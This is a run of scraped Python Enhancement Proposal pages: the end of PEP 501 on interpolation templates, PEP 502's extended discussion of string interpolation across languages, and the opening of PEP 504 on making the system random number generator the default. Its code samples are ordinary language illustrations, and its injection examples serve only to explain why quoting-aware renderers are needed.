Appropriate handling of conversion specifiers is currently an open question.
Exposing them more directly to custom renderers would increase the
complexity of the InterpolationTemplate definition without providing an
increase in expressiveness (since they’re redundant with calling the builtins
directly). At the same time, they are made available as arbitrary strings
when writing custom string.Formatter implementations, so it may be
desirable to offer similar levels of flexibility of interpretation in
interpolation templates.
The !a, !r and !s conversion specifiers supported by str.format
and hence PEP 498 are handled in interpolation templates as follows:
they’re included unmodified in the raw template to ensure no information is
lost
they’re replaced in the parsed template with the corresponding builtin
calls, in order to ensure that field_expr always contains a valid
Python expression
the corresponding field value placed in the field values tuple is
converted appropriately before being passed to the interpolation
template
This means that, for most purposes, the difference between the use of
conversion specifiers and calling the corresponding builtins in the
original interpolation template will be transparent to custom renderers. The
difference will only be apparent if reparsing the raw template, or attempting
to reconstruct the original template from the parsed template.
Writing custom renderers
Writing a custom renderer doesn’t require any special syntax. Instead,
custom renderers are ordinary callables that process an interpolation
template directly either by calling the render() method with alternate render_template or render_field implementations, or by accessing the
template’s data attributes directly.
For example, the following function would render a template using objects’
repr implementations rather than their native formatting support:
def reprformat(template):
    def render_field(value, specifier):
        return format(repr(value), specifier)
    return template.render(render_field=render_field)
When writing custom renderers, note that the return type of the overall
rendering operation is determined by the return type of the passed in render_template callable. While this is expected to be a string in most
cases, producing non-string objects is permitted. For example, a custom
template renderer could involve an sqlalchemy.sql.text call that produces
an SQL Alchemy query object.
Non-strings may also be returned from render_field, as long as it is paired
with a render_template implementation that expects that behaviour.
Expression evaluation
As with f-strings, the subexpressions that are extracted from the interpolation
template are evaluated in the context where the interpolation template
appears. This means the expression has full access to local, nonlocal and global variables. Any valid Python expression can be used inside {}, including
function and method calls.
Because the substitution expressions are evaluated where the string appears in
the source code, there are no additional security concerns related to the
contents of the expression itself, as you could have also just written the
same expression and used runtime field parsing:
>>> bar=10
>>> def foo(data):
...     return data + 20
...
>>> str(i'input={bar}, output={foo(bar)}')
'input=10, output=30'
Is essentially equivalent to:
>>> 'input={}, output={}'.format(bar, foo(bar))
'input=10, output=30'
Handling code injection attacks
The PEP 498 formatted string syntax makes it potentially attractive to write
code like the following:
runquery(f"SELECT {column} FROM {table};")
runcommand(f"cat {filename}")
return_response(f"<html><body>{response.body}</body></html>")
These all represent potential vectors for code injection attacks, if any of the
variables being interpolated happen to come from an untrusted source. The
specific proposal in this PEP is designed to make it straightforward to write
use case specific renderers that take care of quoting interpolated values
appropriately for the relevant security context:
runquery(sql(i"SELECT {column} FROM {table};"))
runcommand(sh(i"cat {filename}"))
return_response(html(i"<html><body>{response.body}</body></html>"))
This PEP does not cover adding such renderers to the standard library
immediately, but rather proposes to ensure that they can be readily provided by
third party libraries, and potentially incorporated into the standard library
at a later date.
For example, a renderer that aimed to offer a POSIX shell style experience for
accessing external programs, without the significant risks posed by running
os.system or enabling the system shell when using the subprocess module
APIs, might provide an interface for running external programs similar to that
offered by the
Julia programming language,
only with the backtick based `cat $filename` syntax replaced by
i"cat {filename}" style interpolation templates.
Format specifiers
Aside from separating them out from the substitution expression during parsing,
format specifiers are otherwise treated as opaque strings by the interpolation
template parser - assigning semantics to those (or, alternatively,
prohibiting their use) is handled at runtime by the field renderer.
Error handling
Either compile time or run time errors can occur when processing interpolation
expressions. Compile time errors are limited to those errors that can be
detected when parsing a template string into its component tuples. These
errors all raise SyntaxError.
Unmatched braces:
>>> i'x={x'
File "<stdin>", line 1
SyntaxError: missing '}' in interpolation expression
Invalid expressions:
>>> i'x={!x}'
File "<fstring>", line 1
!x
^
SyntaxError: invalid syntax
Run time errors occur when evaluating the expressions inside a
template string before creating the interpolation template object. See PEP 498
for some examples.
Different renderers may also impose additional runtime
constraints on acceptable interpolated expressions and other formatting
details, which will be reported as runtime exceptions.
Possible integration with the logging module
One of the challenges with the logging module has been that we have previously
been unable to devise a reasonable migration strategy away from the use of
printf-style formatting. The runtime parsing and interpolation overhead for
logging messages also poses a problem for extensive logging of runtime events
for monitoring purposes.
While beyond the scope of this initial PEP, interpolation template support
could potentially be added to the logging module’s event reporting APIs,
permitting relevant details to be captured using forms like:
logging.debug(i"Event: {event}; Details: {data}")
logging.critical(i"Error: {error}; Details: {data}")
Rather than the current mod-formatting style:
logging.debug("Event: %s; Details: %s", event, data)
logging.critical("Error: %s; Details: %s", event, data)
As the interpolation template is passed in as an ordinary argument, other
keyword arguments would also remain available:
logging.critical(i"Error: {error}; Details: {data}", exc_info=True)
As part of any such integration, a recommended approach would need to be
defined for “lazy evaluation” of interpolated fields, as the logging
module’s existing delayed interpolation support provides access to
various attributes of the event LogRecord instance.
For example, since interpolation expressions are arbitrary Python expressions,
string literals could be used to indicate cases where evaluation itself is
being deferred, not just rendering:
logging.debug(i"Logger: {'record.name'}; Event: {event}; Details: {data}")
This could be further extended with idioms like using inline tuples to indicate
deferred function calls to be made only if the log message is actually
going to be rendered at current logging levels:
logging.debug(i"Event: {event}; Details: {expensive_call, raw_data}")
This kind of approach would be possible as having access to the actual text
of the field expression would allow the logging renderer to distinguish
between inline tuples that appear in the field expression itself, and tuples
that happen to be passed in as data values in a normal field.
Discussion
Refer to PEP 498 for additional discussion, as several of the points there
also apply to this PEP.
Deferring support for binary interpolation
Supporting binary interpolation with this syntax would be relatively
straightforward (the elements in the parsed fields tuple would just be
byte strings rather than text strings, and the default renderer would be
markedly less useful), but poses a significant likelihood of producing
confusing type errors when a text renderer was presented with
binary input.
Since the proposed syntax is useful without binary interpolation support, and
such support can be readily added later, further consideration of binary
interpolation is considered out of scope for the current PEP.
Interoperability with str-only interfaces
For interoperability with interfaces that only accept strings, interpolation
templates can still be prerendered with format, rather than delegating the
rendering to the called function.
This reflects the key difference from PEP 498, which always eagerly applies
the default rendering, without any way to delegate the choice of renderer to
another section of the code.
Preserving the raw template string
Earlier versions of this PEP failed to make the raw template string available
on the interpolation template. Retaining it makes it possible to provide a more
attractive template representation, as well as providing the ability to
precisely reconstruct the original string, including both the expression text
and the details of any eagerly rendered substitution fields in format specifiers.
Creating a rich object rather than a global name lookup
Earlier versions of this PEP used an __interpolate__ builtin, rather than
creating a new kind of object for later consumption by interpolation
functions. Creating a rich descriptive object with a useful default renderer
made it much easier to support customisation of the semantics of interpolation.
Building atop PEP 498, rather than competing with it
Earlier versions of this PEP attempted to serve as a complete substitute for
PEP 498, rather than building a more flexible delayed rendering capability on
top of PEP 498’s eager rendering.
Assuming the presence of f-strings as a supporting capability simplified a
number of aspects of the proposal in this PEP (such as how to handle substitution
fields in format specifiers).
Deferring consideration of possible use in i18n use cases
The initial motivating use case for this PEP was providing a cleaner syntax
for i18n translation, as that requires access to the original unmodified
template. As such, it focused on compatibility with the substitution syntax used
in Python’s string.Template formatting and Mozilla’s l20n project.
However, subsequent discussion revealed there are significant additional
considerations to be taken into account in the i18n use case, which don’t
impact the simpler cases of handling interpolation into security sensitive
contexts (like HTML, system shells, and database queries), or producing
application debugging messages in the preferred language of the development
team (rather than the native language of end users).
Due to the original design of the str.format substitution syntax in PEP 3101
being inspired by C#’s string formatting syntax, the specific field
substitution syntax used in PEP 498 is consistent not only with Python’s own str.format syntax, but also with string formatting in C#, including the
native “$-string” interpolation syntax introduced in C# 6.0 (released in July
2015). The related IFormattable interface in C# forms the basis of a
number of elements of C#’s internationalization and localization
support.
This means that while this particular substitution syntax may not
currently be widely used for translation of Python applications (losing out
to traditional %-formatting and the designed-specifically-for-i18n
string.Template formatting), it is a popular translation format in the
wider software development ecosystem (since it is already the preferred
format for translating C# applications).
Acknowledgements
Eric V. Smith for creating PEP 498 and demonstrating the feasibility of
arbitrary expression substitution in string interpolation
Barry Warsaw, Armin Ronacher, and Mike Miller for their contributions to
exploring the feasibility of using this model of delayed rendering in i18n
use cases (even though the ultimate conclusion was that it was a poor fit,
at least for current approaches to i18n in Python)
References
%-formatting
str.format
string.Template documentation
PEP 215: String Interpolation
PEP 292: Simpler String Substitutions
PEP 3101: Advanced String Formatting
PEP 498: Literal string formatting
FormattableString and C# native string interpolation
IFormattable interface in C# (see remarks for globalization notes)
Running external commands in Julia
Copyright
This document has been placed in the public domain.
| Deferred | PEP 501 – General purpose string interpolation | Standards Track | PEP 498 proposes new syntactic support for string interpolation that is
transparent to the compiler, allow name references from the interpolation
operation full access to containing namespaces (as with any other expression),
rather than being limited to explicit name references. These are referred
to in the PEP as “f-strings” (a mnemonic for “formatted strings”). |
PEP 502 – String Interpolation - Extended Discussion
Author:
Mike G. Miller
Status:
Rejected
Type:
Informational
Created:
10-Aug-2015
Python-Version:
3.6
Table of Contents
Abstract
PEP Status
Motivation
Rationale
Goals
Limitations
Background
Printf-style formatting, via operator
string.Template Class
PEP 215 - String Interpolation
str.format() Method
PEP 498 – Literal String Formatting
PEP 501 – Translation ready string interpolation
Implementations in Other Languages
Bash
Perl
Ruby
Others
Scala
ES6 (Javascript)
C#, Version 6
Apple’s Swift
Additional examples
New Syntax
New String Prefix
Additional Topics
Safety
Mitigation via Tools
Style Guide/Precautions
Reference Implementation(s)
Backwards Compatibility
Postponed Ideas
Internationalization
Rejected Ideas
Restricting Syntax to str.format() Only
Additional/Custom String-Prefixes
Automated Escaping of Input Variables
Environment Access and Command Substitution
Acknowledgements
References
Copyright
Abstract
PEP 498: Literal String Interpolation, which proposed “formatted strings” was
accepted September 9th, 2015.
Additional background and rationale given during its design phase is detailed
below.
To recap that PEP,
a string prefix was introduced that marks the string as a template to be
rendered.
These formatted strings may contain one or more expressions
built on the existing syntax of str.format(). [10] [11]
The formatted string expands at compile-time into a conventional string format
operation,
with the given expressions from its text extracted and passed instead as
positional arguments.
At runtime,
the resulting expressions are evaluated to render a string to given
specifications:
>>> location = 'World'
>>> f'Hello, {location} !' # new prefix: f''
'Hello, World !' # interpolated result
Format-strings may be thought of as merely syntactic sugar to simplify traditional
calls to str.format().
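A minimal illustration of that equivalence (the f-string is compiled directly rather than literally calling str.format(), but the results match):
location = 'World'
eager = f'Hello, {location} !'
legacy = 'Hello, {location} !'.format(location=location)
assert eager == legacy == 'Hello, World !'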
PEP Status
This PEP was rejected because it adopts an opinion-based tone rather than a factual one.
It was also deemed non-critical, since PEP 498 had already been written and is the
appropriate place to record the design decision details.
Motivation
Though string formatting and manipulation features are plentiful in Python,
one area where it falls short
is the lack of a convenient string interpolation syntax.
In comparison to other dynamic scripting languages
with similar use cases,
the amount of code necessary to build similar strings is substantially higher,
while at times offering lower readability due to verbosity, dense syntax,
or identifier duplication.
These difficulties are described at moderate length in the original
post to python-ideas
that started the snowball (that became PEP 498) rolling. [1]
Furthermore, replacement of the print statement with the more consistent print
function of Python 3 (PEP 3105) has added one additional minor burden,
an additional set of parentheses to type and read.
Combined with the verbosity of current string formatting solutions,
this puts an otherwise simple language at an unfortunate disadvantage to its
peers:
echo "Hello, user: $user, id: $id, on host: $hostname" # bash
say "Hello, user: $user, id: $id, on host: $hostname"; # perl
puts "Hello, user: #{user}, id: #{id}, on host: #{hostname}\n" # ruby
# 80 ch -->|
# Python 3, str.format with named parameters
print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(**locals()))
# Python 3, worst case
print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(user=user,
                                                                   id=id,
                                                                   hostname=
                                                                   hostname))
In Python, the formatting and printing of a string with multiple variables in a
single line of code of standard width is noticeably harder and more verbose,
with indentation exacerbating the issue.
For use cases such as smaller projects, systems programming,
shell script replacements, and even one-liners,
where message formatting complexity has yet to be encapsulated,
this verbosity has likely led a significant number of developers and
administrators to choose other languages over the years.
Rationale
Goals
The design goals of format strings are as follows:
Eliminate need to pass variables manually.
Eliminate repetition of identifiers and redundant parentheses.
Reduce awkward syntax, punctuation characters, and visual noise.
Improve readability and eliminate mismatch errors,
by preferring named parameters to positional arguments.
Avoid need for locals() and globals() usage,
instead parsing the given string for named parameters,
then passing them automatically. [2] [3]
Limitations
In contrast to other languages that take design cues from Unix and its
shells,
and in common with Javascript,
Python specified both single (') and double (") ASCII quote
characters to enclose strings.
It is not reasonable to choose one of them now to enable interpolation,
while leaving the other for uninterpolated strings.
Other characters,
such as the “Backtick” (or grave accent `) are also
constrained by history
as a shortcut for repr().
This leaves a few remaining options for the design of such a feature:
An operator, as in printf-style string formatting via %.
A class, such as string.Template().
A method or function, such as str.format().
New syntax, or
A new string prefix marker, such as the well-known r'' or u''.
The first three options above are mature.
Each has specific use cases and drawbacks,
yet also suffer from the verbosity and visual noise mentioned previously.
All options are discussed in the next sections.
Background
Formatted strings build on several existing techniques and proposals and what
we’ve collectively learned from them.
In keeping with the design goals of readability and error-prevention,
the following examples therefore use named,
not positional arguments.
Let’s assume we have the following dictionary,
and would like to print out its items as an informative string for end users:
>>> params = {'user': 'nobody', 'id': 9, 'hostname': 'darkstar'}
Printf-style formatting, via operator
This venerable technique continues to have its uses,
such as with byte-based protocols,
simplicity in simple cases,
and familiarity to many programmers:
>>> 'Hello, user: %(user)s, id: %(id)s, on host: %(hostname)s' % params
'Hello, user: nobody, id: 9, on host: darkstar'
In this form, considering the prerequisite dictionary creation,
the technique is verbose, a tad noisy,
yet relatively readable.
Additional issues are that an operator can only take one argument besides the
original string,
meaning multiple parameters must be passed in a tuple or dictionary.
Also, it is relatively easy to make an error in the number of arguments passed,
the expected type,
have a missing key,
or forget the trailing type, e.g. (s or d).
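A few illustrative failure modes of the operator-based approach (a sketch; the exact exception messages vary between Python versions):
params = {'user': 'nobody', 'id': 9, 'hostname': 'darkstar'}

'Hello, user: %(user)s, id: %(id)d' % params   # OK
'Hello, user: %(user)s' % {'id': 9}            # KeyError: missing key
'id: %d, host: %s' % (9,)                      # TypeError: not enough arguments
'Hello, user: %(user)' % params                # ValueError: incomplete format (trailing 's' forgotten)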
string.Template Class
The string.Template class from PEP 292
(Simpler String Substitutions)
is a purposely simplified design,
using familiar shell interpolation syntax,
with safe-substitution feature,
that finds its main use cases in shell and internationalization tools:
Template('Hello, user: $user, id: ${id}, on host: $hostname').substitute(params)
While also verbose, the string itself is readable.
Though functionality is limited,
it meets its requirements well.
It isn’t powerful enough for many cases,
and that helps keep inexperienced users out of trouble,
as well as avoiding issues with moderately-trusted input (i18n) from
third-parties.
It unfortunately takes enough code to discourage its use for ad-hoc string
interpolation,
unless encapsulated in a convenience library such as flufl.i18n.
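For completeness, the safe-substitution behaviour mentioned above leaves unknown placeholders in place rather than raising KeyError:
from string import Template

t = Template('Hello, user: $user, id: ${id}, on host: $hostname')
t.safe_substitute({'user': 'nobody'})
# 'Hello, user: nobody, id: ${id}, on host: $hostname'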
PEP 215 - String Interpolation
PEP 215 was an earlier proposal with which this one has a lot in common.
Apparently, the world was not ready for it at the time,
but considering recent support in a number of other languages,
its day may have come.
The large number of dollar sign ($) characters it included may have
led it to resemble Python’s arch-nemesis Perl,
and likely contributed to the PEP’s lack of acceptance.
It was superseded by the following proposal.
str.format() Method
The str.format() syntax of PEP 3101 is the most recent and modern of the
existing options.
It is also more powerful and usually easier to read than the others.
It avoids many of the drawbacks and limits of the previous techniques.
However, due to its necessary function call and parameter passing,
it runs from verbose to very verbose in various situations with
string literals:
>>> 'Hello, user: {user}, id: {id}, on host: {hostname}'.format(**params)
'Hello, user: nobody, id: 9, on host: darkstar'
# when using keyword args, var name shortening sometimes needed to fit :/
>>> 'Hello, user: {user}, id: {id}, on host: {host}'.format(user=user,
                                                            id=id,
                                                            host=hostname)
'Hello, user: nobody, id: 9, on host: darkstar'
The verbosity of the method-based approach is illustrated here.
PEP 498 – Literal String Formatting
PEP 498 defines and discusses format strings,
as also described in the Abstract above.
It also, somewhat controversially to those first exposed,
introduces the idea that format-strings shall be augmented with support for
arbitrary expressions.
This is discussed further in the
Restricting Syntax section under
Rejected Ideas.
PEP 501 – Translation ready string interpolation
The complementary PEP 501 brings internationalization into the discussion as a
first-class concern, with its proposal of the i-prefix,
string.Template syntax integration compatible with ES6 (Javascript),
deferred rendering,
and an object return value.
Implementations in Other Languages
String interpolation is now well supported by various programming languages
used in multiple industries,
and is converging into a standard of sorts.
It is centered around str.format() style syntax in minor variations,
with the addition of arbitrary expressions to expand utility.
In the Motivation section it was shown how convenient interpolation syntax
existed in Bash, Perl, and Ruby.
Let’s take a look at their expression support.
Bash
Bash supports a number of arbitrary, even recursive constructs inside strings:
> echo "user: $USER, id: $((id + 6)) on host: $(echo is $(hostname))"
user: nobody, id: 15 on host: is darkstar
Explicit interpolation within double quotes.
Direct environment variable access supported.
Arbitrary expressions are supported. [4]
External process execution and output capture supported. [5]
Recursive expressions are supported.
Perl
Perl also has arbitrary expression constructs, perhaps not as well known:
say "I have @{[$id + 6]} guanacos."; # lists
say "I have ${\($id + 6)} guanacos."; # scalars
say "Hello { @names.join(', ') } how are you?"; # Perl 6 version
Explicit interpolation within double quotes.
Arbitrary expressions are supported. [6] [7]
Ruby
Ruby allows arbitrary expressions in its interpolated strings:
puts "One plus one is two: #{1 + 1}\n"
Explicit interpolation within double quotes.
Arbitrary expressions are supported. [8] [9]
Possible to change delimiter chars with %.
See the Reference Implementation(s) section for an implementation in Python.
Others
Let’s look at some less-similar modern languages recently implementing string
interpolation.
Scala
Scala interpolation is directed through string prefixes.
Each prefix has a different result:
s"Hello, $name ${1 + 1}" # arbitrary
f"$name%s is $height%2.2f meters tall" # printf-style
raw"a\nb" # raw, like r''
These prefixes may also be implemented by the user,
by extending Scala’s StringContext class.
Explicit interpolation within double quotes with literal prefix.
User implemented prefixes supported.
Arbitrary expressions are supported.
ES6 (Javascript)
Designers of Template strings faced the same issue as Python where single
and double quotes were taken.
Unlike Python however, “backticks” were not.
Despite their issues,
they were chosen as part of the ECMAScript 2015 (ES6) standard:
console.log(`Fifteen is ${a + b} and\nnot ${2 * a + b}.`);
Custom prefixes are also supported by implementing a function the same name
as the tag:
function tag(strings, ...values) {
    console.log(strings.raw[0]); // raw string is also available
    return "Bazinga!";
}

tag`Hello ${ a + b } world ${ a * b}`;
Explicit interpolation within backticks.
User implemented prefixes supported.
Arbitrary expressions are supported.
C#, Version 6
C# has a useful new interpolation feature as well,
with some ability to customize interpolation via the IFormattable
interface:
$"{person.Name, 20} is {person.Age:D3} year{(p.Age == 1 ? "" : "s")} old.";
Explicit interpolation with double quotes and $ prefix.
Custom interpolations are available.
Arbitrary expressions are supported.
Apple’s Swift
Arbitrary interpolation under Swift is available on all strings:
let multiplier = 3
let message = "\(multiplier) times 2.5 is \(Double(multiplier) * 2.5)"
// message is "3 times 2.5 is 7.5"
Implicit interpolation with double quotes.
Arbitrary expressions are supported.
Cannot contain CR/LF.
Additional examples
A number of additional examples of string interpolation may be
found at Wikipedia.
Now that background and history have been covered,
let’s continue on for a solution.
New Syntax
This should be an option of last resort,
as every new syntax feature has a cost in terms of real-estate in a brain it
inhabits.
There is however one alternative left on our list of possibilities,
which follows.
New String Prefix
Given the history of string formatting in Python and backwards-compatibility,
implementations in other languages,
avoidance of new syntax unless necessary,
an acceptable design is reached through elimination
rather than unique insight.
Therefore, marking interpolated string literals with a string prefix is chosen.
We also choose an expression syntax that reuses and builds on the strongest of
the existing choices,
str.format() to avoid further duplication of functionality:
>>> location = 'World'
>>> f'Hello, {location} !' # new prefix: f''
'Hello, World !' # interpolated result
PEP 498 – Literal String Formatting, delves into the mechanics and
implementation of this design.
Additional Topics
Safety
In this section we will describe the safety situation and precautions taken
in support of format-strings.
Only string literals have been considered for format-strings,
not variables to be taken as input or passed around,
making external attacks difficult to accomplish. str.format() and alternatives already handle this use-case.
Neither locals() nor globals() are necessary nor used during the
transformation,
avoiding leakage of information.
To eliminate complexity as well as RuntimeError(s) due to recursion
depth, recursive interpolation is not supported.
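For example, with the accepted f-string behaviour, braces inside an interpolated value are treated as literal text rather than being interpolated a second time:
value = '{injected}'
assert f'result: {value}' == 'result: {injected}'   # no recursive interpolation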
However,
mistakes or malicious code could be missed inside string literals.
Though that can be said of code in general,
that these expressions are inside strings means they are a bit more likely
to be obscured.
Mitigation via Tools
The idea is that tools or linters such as pyflakes, pylint, or PyCharm
may check inside strings with expressions and mark them up appropriately.
As this is a common task with programming languages today,
multi-language tools won’t have to implement this feature solely for Python,
significantly shortening time to implementation.
Farther in the future,
strings might also be checked for constructs that exceed the safety policy of
a project.
Style Guide/Precautions
As arbitrary expressions may accomplish anything a Python expression is
able to,
it is highly recommended to avoid constructs inside format-strings that could
cause side effects.
Further guidelines may be written once usage patterns and true problems are
known.
Reference Implementation(s)
The say module on PyPI implements string interpolation as described here
with the small burden of a callable interface:
> pip install say
from say import say
nums = list(range(4))
say("Nums has {len(nums)} items: {nums}")
A Python implementation of Ruby interpolation is also available.
It uses the codecs module to do its work:
> pip install interpy
# coding: interpy
location = 'World'
print("Hello #{location}.")
Backwards Compatibility
By using existing syntax and avoiding current or historical features,
format strings were designed so as to not interfere with existing code and are
not expected to cause any issues.
Postponed Ideas
Internationalization
Though it was highly desired to integrate internationalization support,
(see PEP 501),
the finer details diverge at almost every point,
making a common solution unlikely: [15]
Use-cases differ
Compile vs. run-time tasks
Interpolation syntax needs
Intended audience
Security policy
Rejected Ideas
Restricting Syntax to str.format() Only
The common arguments against support of arbitrary expressions were:
YAGNI, “You aren’t gonna need it.”
The feature is not congruent with historical Python conservatism.
Postpone - can implement in a future version if need is demonstrated.
Support of only str.format() syntax however,
was deemed not enough of a solution to the problem.
Often a simple length or increment of an object, for example,
is desired before printing.
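A small illustration of the difference (names chosen only for this example):
nums = list(range(4))

# With arbitrary expressions, as accepted in PEP 498:
f'Nums has {len(nums)} items: {nums}'

# Restricted to str.format()-style fields, the value must be computed separately:
'Nums has {n} items: {nums}'.format(n=len(nums), nums=nums)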
It can be seen in the Implementations in Other Languages section that the
developer community at large tends to agree.
String interpolation with arbitrary expressions is becoming an industry
standard in modern languages due to its utility.
Additional/Custom String-Prefixes
As seen in the Implementations in Other Languages section,
many modern languages have extensible string prefixes with a common interface.
This could be a way to generalize and reduce lines of code in common
situations.
Examples are found in ES6 (Javascript), Scala, Nim, and C#
(to a lesser extent).
This was rejected by the BDFL. [14]
Automated Escaping of Input Variables
While helpful in some cases,
this was thought to create too much uncertainty of when and where string
expressions could be used safely or not.
The concept was also difficult to describe to others. [12]
Always consider format string variables to be unescaped,
unless the developer has explicitly escaped them.
Environment Access and Command Substitution
For systems programming and shell-script replacements,
it would be useful to handle environment variables and capture output of
commands directly in an expression string.
This was rejected as not important enough,
and looking too much like bash/perl,
which could encourage bad habits. [13]
Acknowledgements
Eric V. Smith for the authoring and implementation of PEP 498.
Everyone on the python-ideas mailing list for rejecting the various crazy
ideas that came up,
helping to keep the final design in focus.
References
[1]
Briefer String Format
(https://mail.python.org/pipermail/python-ideas/2015-July/034659.html)
[2]
Briefer String Format
(https://mail.python.org/pipermail/python-ideas/2015-July/034669.html)
[3]
Briefer String Format
(https://mail.python.org/pipermail/python-ideas/2015-July/034701.html)
[4]
Bash Docs
(https://tldp.org/LDP/abs/html/arithexp.html)
[5]
Bash Docs
(https://tldp.org/LDP/abs/html/commandsub.html)
[6]
Perl Cookbook
(https://docstore.mik.ua/orelly/perl/cookbook/ch01_11.htm)
[7]
Perl Docs
(https://web.archive.org/web/20121025185907/https://perl6maven.com/perl6-scalar-array-and-hash-interpolation)
[8]
Ruby Docs
(http://ruby-doc.org/core-2.1.1/doc/syntax/literals_rdoc.html#label-Strings)
[9]
Ruby Docs
(https://en.wikibooks.org/wiki/Ruby_Programming/Syntax/Literals#Interpolation)
[10]
Python Str.Format Syntax
(https://docs.python.org/3.6/library/string.html#format-string-syntax)
[11]
Python Format-Spec Mini Language
(https://docs.python.org/3.6/library/string.html#format-specification-mini-language)
[12]
Escaping of Input Variables
(https://mail.python.org/pipermail/python-ideas/2015-August/035532.html)
[13]
Environment Access and Command Substitution
(https://mail.python.org/pipermail/python-ideas/2015-August/035554.html)
[14]
Extensible String Prefixes
(https://mail.python.org/pipermail/python-ideas/2015-August/035336.html)
[15]
Literal String Formatting
(https://mail.python.org/pipermail/python-dev/2015-August/141289.html)
Copyright
This document has been placed in the public domain.
| Rejected | PEP 502 – String Interpolation - Extended Discussion | Informational | PEP 498: Literal String Interpolation, which proposed “formatted strings” was
accepted September 9th, 2015.
Additional background and rationale given during its design phase is detailed
below. |
PEP 504 – Using the System RNG by default
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
15-Sep-2015
Python-Version:
3.6
Post-History:
15-Sep-2015
Table of Contents
Abstract
PEP Withdrawal
Proposal
Warning on implicit opt-in
Performance impact
Documentation changes
Rationale
Discussion
Why “ensure_repeatable” over “ensure_deterministic”?
Only changing the default for Python 3.6+
Keeping the module level functions
Warning when implicitly opting in to the deterministic RNG
Avoiding the introduction of a userspace CSPRNG
Isn’t the deterministic PRNG “secure enough”?
Security fatigue in the Python ecosystem
Acknowledgements
References
Copyright
Abstract
Python currently defaults to using the deterministic Mersenne Twister random
number generator for the module level APIs in the random module, requiring
users to know that when they’re performing “security sensitive” work, they
should instead switch to using the cryptographically secure os.urandom or
random.SystemRandom interfaces or a third party library like
cryptography.
Unfortunately, this approach has resulted in a situation where developers that
aren’t aware that they’re doing security sensitive work use the default module
level APIs, and thus expose their users to unnecessary risks.
This isn’t an acute problem, but it is a chronic one, and the often long
delays between the introduction of security flaws and their exploitation mean
that it is difficult for developers to naturally learn from experience.
In order to provide an eventually pervasive solution to the problem, this PEP
proposes that Python switch to using the system random number generator by
default in Python 3.6, and require developers to opt-in to using the
deterministic random number generator process wide either by using a new
random.ensure_repeatable() API, or by explicitly creating their own
random.Random() instance.
To minimise the impact on existing code, module level APIs that require
determinism will implicitly switch to the deterministic PRNG.
PEP Withdrawal
During discussion of this PEP, Steven D’Aprano proposed the simpler alternative
of offering a standardised secrets module that provides “one obvious way”
to handle security sensitive tasks like generating default passwords and other
tokens.
Steven’s proposal has the desired effect of aligning the easy way to generate
such tokens and the right way to generate them, without introducing any
compatibility risks for the existing random module API, so this PEP has
been withdrawn in favour of further work on refining Steven’s proposal as
PEP 506.
Proposal
Currently, it is never correct to use the module level functions in the
random module for security sensitive applications. This PEP proposes to
change that admonition in Python 3.6+ to instead be that it is not correct to
use the module level functions in the random module for security sensitive
applications if random.ensure_repeatable() is ever called (directly or
indirectly) in that process.
To achieve this, rather than being bound methods of a random.Random
instance as they are today, the module level callables in random would
change to be functions that delegate to the corresponding method of the
existing random._inst module attribute.
By default, this attribute will be bound to a random.SystemRandom instance.
A new random.ensure_repeatable() API will then rebind the random._inst
attribute to a random.Random instance, restoring the same module level
API behaviour as existed in previous Python versions (aside from the
additional level of indirection):
def ensure_repeatable():
    """Switch to using random.Random() for the module level APIs

    This switches the default RNG instance from the cryptographically
    secure random.SystemRandom() to the deterministic random.Random(),
    enabling the seed(), getstate() and setstate() operations. This means
    a particular random scenario can be replayed later by providing the
    same seed value or restoring a previously saved state.

    NOTE: Libraries implementing security sensitive operations should
    always explicitly use random.SystemRandom() or os.urandom in order to
    correctly handle applications that call this function.
    """
    global _inst  # rebind the module level default instance, not a local name
    if not isinstance(_inst, Random):
        _inst = random.Random()
To minimise the impact on existing code, calling any of the following module
level functions will implicitly call random.ensure_repeatable():
random.seed
random.getstate
random.setstate
There are no changes proposed to the random.Random or
random.SystemRandom class APIs - applications that explicitly instantiate
their own random number generators will be entirely unaffected by this
proposal.
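A minimal sketch of the proposed delegation (illustrative only, with names mirroring the description above rather than an actual patch to the random module):
from random import Random, SystemRandom

_inst = SystemRandom()   # secure by default under this proposal

def random():
    # Module level function forwarding to whichever instance _inst is currently bound to
    return _inst.random()

def getrandbits(k):
    return _inst.getrandbits(k)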
Warning on implicit opt-in
In Python 3.6, implicitly opting in to the use of the deterministic PRNG will
emit a deprecation warning using the following check:
if not isinstance(_inst, Random):
    warnings.warn("Implicitly ensuring repeatability. "
                  "See help(random.ensure_repeatable) for details",
                  DeprecationWarning)
    ensure_repeatable()
The specific wording of the warning should have a suitable answer added to
Stack Overflow as was done for the custom error message that was added for
missing parentheses in a call to print [10].
In the first Python 3 release after Python 2.7 switches to security fix only
mode, the deprecation warning will be upgraded to a RuntimeWarning so it is
visible by default.
This PEP does not propose ever removing the ability to ensure the default RNG
used process wide is a deterministic PRNG that will produce the same series of
outputs given a specific seed. That capability is widely used in modelling
and simulation scenarios, and requiring that ensure_repeatable() be called
either directly or indirectly is a sufficient enhancement to address the cases
where the module level random API is used for security sensitive tasks in web
applications without due consideration for the potential security implications
of using a deterministic PRNG.
Performance impact
Due to the large performance difference between random.Random and
random.SystemRandom, applications ported to Python 3.6 will encounter a
significant performance regression in cases where:
the application is using the module level random API
cryptographic quality randomness isn’t needed
the application doesn’t already implicitly opt back in to the deterministic
PRNG by calling random.seed, random.getstate, or random.setstate
the application isn’t updated to explicitly call random.ensure_repeatable
This would be noted in the Porting section of the Python 3.6 What’s New guide,
with the recommendation to include the following code in the __main__
module of affected applications:
if hasattr(random, "ensure_repeatable"):
random.ensure_repeatable()
Applications that do need cryptographic quality randomness should be using the
system random number generator regardless of speed considerations, so in those
cases the change proposed in this PEP will fix a previously latent security
defect.
Documentation changes
The random module documentation would be updated to move the documentation
of the seed, getstate and setstate interfaces later in the module,
along with the documentation of the new ensure_repeatable function and the
associated security warning.
That section of the module documentation would also gain a discussion of the
respective use cases for the deterministic PRNG enabled by
ensure_repeatable (games, modelling & simulation, software testing) and the
system RNG that is used by default (cryptography, security token generation).
This discussion will also recommend the use of third party security libraries
for the latter task.
Rationale
Writing secure software under deadline and budget pressures is a hard problem.
This is reflected in regular notifications of data breaches involving personally
identifiable information [1], as well as with failures to take
security considerations into account when new systems, like motor vehicles
[2], are connected to the internet. It’s also the case that a lot of
the programming advice readily available on the internet [4] simply
doesn’t take the mathematical arcana of computer security into account.
Compounding these issues is the fact that defenders have to cover all of
their potential vulnerabilities, as a single mistake can make it possible to
subvert other defences [11].
